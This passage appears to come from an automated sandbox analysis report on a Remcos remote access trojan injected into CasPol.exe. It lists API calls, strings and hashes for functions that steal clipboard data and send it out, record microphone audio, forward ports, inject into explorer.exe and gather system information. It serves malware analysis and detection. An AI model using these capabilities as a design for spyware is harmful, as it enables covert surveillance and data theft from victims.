                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                            • String ID: 0VG$0VG$<$@$Temp
                            • API String ID: 1704390241-2575729100
                            • Opcode ID: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                            • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                            • Opcode Fuzzy Hash: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                            • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                            Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                            Download Yara Rule
                            APIs
                            • OpenClipboard.USER32 ref: 00416941
                            • EmptyClipboard.USER32 ref: 0041694F
                            • CloseClipboard.USER32 ref: 00416955
                            • OpenClipboard.USER32 ref: 0041695C
                            • GetClipboardData.USER32(0000000D), ref: 0041696C
                            • GlobalLock.KERNEL32(00000000), ref: 00416975
                            • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                            • CloseClipboard.USER32 ref: 00416984
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                            • String ID: !D@
                            • API String ID: 2172192267-604454484
                            • Opcode ID: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                            • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                            • Opcode Fuzzy Hash: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                            • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                            Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                            • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                            • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                            • CloseHandle.KERNEL32(00000000), ref: 0041345F
                            • CloseHandle.KERNEL32(?), ref: 00413465
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                            • String ID:
                            • API String ID: 297527592-0
                            • Opcode ID: 7389cf943c6bcf248480826047218ee6b0a919d85f38051736b06d81fd75e68c
                            • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                            • Opcode Fuzzy Hash: 7389cf943c6bcf248480826047218ee6b0a919d85f38051736b06d81fd75e68c
                            • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                            Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                            • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                            • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                            • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                            Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 00448135
                              • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                            • _free.LIBCMT ref: 00448141
                            • _free.LIBCMT ref: 0044814C
                            • _free.LIBCMT ref: 00448157
                            • _free.LIBCMT ref: 00448162
                            • _free.LIBCMT ref: 0044816D
                            • _free.LIBCMT ref: 00448178
                            • _free.LIBCMT ref: 00448183
                            • _free.LIBCMT ref: 0044818E
                            • _free.LIBCMT ref: 0044819C
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                            • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                            • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                            • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                            Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Eventinet_ntoa
                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                            • API String ID: 3578746661-3604713145
                            • Opcode ID: 0aaec6cc8c90d6b1939344197441932741b7c983eabe6e48104fb2666182c0a3
                            • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                            • Opcode Fuzzy Hash: 0aaec6cc8c90d6b1939344197441932741b7c983eabe6e48104fb2666182c0a3
                            • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                            Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: DecodePointer
                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                            • API String ID: 3527080286-3064271455
                            • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                            • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                            • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                            • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                            Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                            Download Yara Rule
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                              • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                            • Sleep.KERNEL32(00000064), ref: 00417521
                            • DeleteFileW.KERNEL32(00000000), ref: 00417555
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateDeleteExecuteShellSleep
                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                            • API String ID: 1462127192-2001430897
                            • Opcode ID: 80bc1f01d41e6bb49ab2ea0752573067485f1394140a330d823018e0c212e60a
                            • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                            • Opcode Fuzzy Hash: 80bc1f01d41e6bb49ab2ea0752573067485f1394140a330d823018e0c212e60a
                            • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                            Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                            • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 0040749E
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess
                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                            • API String ID: 2050909247-4242073005
                            • Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                            • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                            • Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                            • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                            Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • _strftime.LIBCMT ref: 00401D50
                              • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                            • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                            • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                            • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                            • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                            • API String ID: 3809562944-243156785
                            • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                            • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                            • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                            • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                            Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                            • int.LIBCPMT ref: 00410E81
                              • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                              • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                            • std::_Facet_Register.LIBCPMT ref: 00410EC1
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                            • __Init_thread_footer.LIBCMT ref: 00410F29
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                            • String ID: ,kG$0kG
                            • API String ID: 3815856325-2015055088
                            • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                            • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                            • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                            • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                            Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                            Download Yara Rule
                            APIs
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                            • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                            • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                            • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                            • waveInStart.WINMM ref: 00401CFE
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                            • String ID: dMG$|MG$PG
                            • API String ID: 1356121797-532278878
                            • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                            • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                            • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                            • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                            Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                              • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                              • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                              • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                            • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                            • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                            • TranslateMessage.USER32(?), ref: 0041D4E9
                            • DispatchMessageA.USER32(?), ref: 0041D4F3
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                            • String ID: Remcos
                            • API String ID: 1970332568-165870891
                            • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                            • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                            • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                            • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                            Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                            • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                            • Opcode Fuzzy Hash: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                            • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                            Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                            • _memcmp.LIBVCRUNTIME ref: 00445423
                            • _free.LIBCMT ref: 00445494
                            • _free.LIBCMT ref: 004454AD
                            • _free.LIBCMT ref: 004454DF
                            • _free.LIBCMT ref: 004454E8
                            • _free.LIBCMT ref: 004454F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorLast$_abort_memcmp
                            • String ID: C
                            • API String ID: 1679612858-1037565863
                            • Opcode ID: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                            • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                            • Opcode Fuzzy Hash: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                            • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                            Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: tcp$udp
                            • API String ID: 0-3725065008
                            • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                            • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                            • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                            • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                            Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                            Download Yara Rule
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 004018BE
                            • ExitThread.KERNEL32 ref: 004018F6
                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                              • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                            • String ID: PkG$XMG$NG$NG
                            • API String ID: 1649129571-3151166067
                            • Opcode ID: d792f27428e216ec403bd2c8f2a7274a29a7ee60ee52af981f0ff1553ee06993
                            • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                            • Opcode Fuzzy Hash: d792f27428e216ec403bd2c8f2a7274a29a7ee60ee52af981f0ff1553ee06993
                            • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                            Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                            • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                              • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                              • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                            • String ID: .part
                            • API String ID: 1303771098-3499674018
                            • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                            • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                            • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                            • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                            Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                            • __alloca_probe_16.LIBCMT ref: 0044ACDB
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                            • __alloca_probe_16.LIBCMT ref: 0044ADC0
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                            • __freea.LIBCMT ref: 0044AE30
                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            • __freea.LIBCMT ref: 0044AE39
                            • __freea.LIBCMT ref: 0044AE5E
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                            • String ID:
                            • API String ID: 3864826663-0
                            • Opcode ID: f133f672f31cad4c1eaa5701a27b160f43f27f2d719f30c1e4d65ec3bb2f8dff
                            • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                            • Opcode Fuzzy Hash: f133f672f31cad4c1eaa5701a27b160f43f27f2d719f30c1e4d65ec3bb2f8dff
                            • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                            Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                            • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: InputSend
                            • String ID:
                            • API String ID: 3431551938-0
                            • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                            • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                            • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                            • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                            Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: __freea$__alloca_probe_16_free
                            • String ID: a/p$am/pm$zD
